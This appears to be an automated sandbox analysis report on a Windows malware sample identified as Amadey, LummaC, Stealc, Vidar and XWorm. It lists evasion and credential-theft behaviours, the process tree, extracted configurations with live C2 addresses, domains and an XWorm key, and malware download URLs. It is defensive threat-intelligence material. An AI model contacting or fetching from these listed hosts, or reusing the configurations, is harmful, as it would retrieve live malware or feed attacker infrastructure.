Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1570613
MD5:	2704b8659485a783c81f96440f2f5ca4
SHA1:	d8883d8802dd0363cc505cbae99d3c37fa83b283
SHA256:	a63c8da0504eb526d7a28d684872a1aca575819f46a0ecef131d30ac2d6da4ed
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, LummaC Stealer, Stealc, Vidar, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

Yara detected XWorm

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Use Short Name Path in Command Line

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2704B8659485A783C81F96440F2F5CA4)

chrome.exe (PID: 7308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2840,i,13733945476958162739,14775988417437195856,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 3020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2840 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=2424,i,11967223973417229962,6328825183861097206,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 7816 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\AAAAECGHCB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AAAAECGHCB.exe (PID: 1168 cmdline: "C:\Users\user\Documents\AAAAECGHCB.exe" MD5: 8EFB48F6DD50828EA9F89FE49C923C17)

skotes.exe (PID: 7520 cmdline: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 8EFB48F6DD50828EA9F89FE49C923C17)

msedge.exe (PID: 6468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8024 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=2160,i,15529322534774427981,4503819060764799590,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

skotes.exe (PID: 7504 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 8EFB48F6DD50828EA9F89FE49C923C17)

skotes.exe (PID: 6952 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 8EFB48F6DD50828EA9F89FE49C923C17)

qk4EiZw.exe (PID: 7600 cmdline: "C:\Users\user~1\AppData\Local\Temp\1012933001\qk4EiZw.exe" MD5: 7006F5208C072600F4DC6B5FC302229D)

9faf801df7.exe (PID: 8024 cmdline: "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe" MD5: 8D608898B8BB1E2E97BE0FAA61584F2E)

0fb4fa91ba.exe (PID: 6060 cmdline: "C:\Users\user~1\AppData\Local\Temp\1012943001\0fb4fa91ba.exe" MD5: 2704B8659485A783C81F96440F2F5CA4)

e0da62c8af.exe (PID: 2700 cmdline: "C:\Users\user~1\AppData\Local\Temp\1012944001\e0da62c8af.exe" MD5: 5EB4AF9A47B9E2F7B74E7E02AF5C444A)

9faf801df7.exe (PID: 3588 cmdline: "C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe" MD5: 8D608898B8BB1E2E97BE0FAA61584F2E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["formy-spill.biz", "print-vexer.biz", "dare-curbys.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "se-blurry.biz", "covery-mover.biz", "impend-differ.biz", "atten-supporse.biz"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Xworm

{"C2 url": ["112.213.116.149"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001B.00000003.2205328066.0000000005030000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7926:$cnc4: POST / HTTP/1.1
00000015.00000002.1908666630.0000000000241000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.2518875337.0000000005395000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000019.00000002.2504021712.0000000000241000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1852024640.000000000108C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.2478530971.0000000000BE1000.00000040.00000001.01000000.00000013.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000002.2480751384.00000000015EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001B.00000002.2503940481.00000000001C2000.00000040.00000001.01000000.0000000F.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7926:$cnc4: POST / HTTP/1.1
00000014.00000002.1869616191.0000000000541000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1852024640.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.1908076388.0000000000241000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 6564	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6564	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 6564	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: qk4EiZw.exe PID: 7600	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 0fb4fa91ba.exe PID: 6060	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0fb4fa91ba.exe PID: 6060	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.qk4EiZw.exe.1c0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
27.2.qk4EiZw.exe.1c0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8078:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8115:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x822a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7d26:$cnc4: POST / HTTP/1.1
21.2.skotes.exe.240000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
25.2.skotes.exe.240000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.AAAAECGHCB.exe.540000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.skotes.exe.240000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
29.2.0fb4fa91ba.exe.be0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.file.exe.fc0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.fc0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9faf801df7.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6564, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7308, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1012942001\9faf801df7.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 6952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9faf801df7.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe, ProcessId: 7600, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7504, ProcessName: skotes.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:54.668397+0100	2028371	3	Unknown Traffic	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:57.290621+0100	2028371	3	Unknown Traffic	192.168.2.7	49966	104.21.16.9	443	TCP
2024-12-07T13:01:14.561754+0100	2028371	3	Unknown Traffic	192.168.2.7	50005	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:56.809264+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49954	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:56.809264+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49954	104.21.16.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:54.668397+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.7	49954	104.21.16.9	443	TCP
2024-12-07T13:00:57.290621+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.7	49966	104.21.16.9	443	TCP
2024-12-07T13:01:14.561754+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.7	50005	104.21.16.9	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:46.086982+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49932	185.215.113.43	80	TCP
2024-12-07T13:00:54.438192+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49953	185.215.113.43	80	TCP
2024-12-07T13:01:08.057178+0100	2044696	1	A Network Trojan was detected	192.168.2.7	49987	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:53.304937+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.7	55337	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:12.814627+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.7	49701	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:12.693023+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.7	49701	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:13.143279+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.7	49701	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:14.588048+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.7	49701	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:13.272980+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.7	49701	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:12.246711+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T13:01:09.536496+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.7	49991	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:34.763032+0100	2856147	1	A Network Trojan was detected	192.168.2.7	49904	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:44.750548+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.7	49913	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:00:39.307009+0100	2803305	3	Unknown Traffic	192.168.2.7	49915	31.41.244.11	80	TCP
2024-12-07T13:00:47.587255+0100	2803305	3	Unknown Traffic	192.168.2.7	49936	185.215.113.16	80	TCP
2024-12-07T13:00:55.894697+0100	2803305	3	Unknown Traffic	192.168.2.7	49959	185.215.113.16	80	TCP
2024-12-07T13:01:09.512441+0100	2803305	3	Unknown Traffic	192.168.2.7	49994	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T12:59:15.566968+0100	2803304	3	Unknown Traffic	192.168.2.7	49701	185.215.113.206	80	TCP
2024-12-07T12:59:44.193563+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:46.107197+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:47.502317+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:48.691740+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:52.256701+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:53.383845+0100	2803304	3	Unknown Traffic	192.168.2.7	49788	185.215.113.206	80	TCP
2024-12-07T12:59:59.171322+0100	2803304	3	Unknown Traffic	192.168.2.7	49829	185.215.113.16	80	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:01:04.435070+0100	2852870	1	Malware Command and Control Activity Detected	112.213.116.149	7000	192.168.2.7	49946	TCP
2024-12-07T13:01:16.149117+0100	2852870	1	Malware Command and Control Activity Detected	112.213.116.149	7000	192.168.2.7	49946	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:01:04.554830+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.7	49946	112.213.116.149	7000	TCP
2024-12-07T13:01:16.243981+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.7	49946	112.213.116.149	7000	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T13:01:15.616343+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.7	49946	112.213.116.149	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllL	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7299809293/qk4EiZw.exeXYZ0123456789	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/&	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7299809293/qk4EiZw.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllf	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpcg	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php1e	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7299809293/qk4EiZw.exeshqos.dll)U	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpBS;.VBE;.JS;.JSE;.	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllD	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllb	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiA6	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpy5	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllb	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllS	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php&_	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/8	Avira URL Cloud: Label: malware
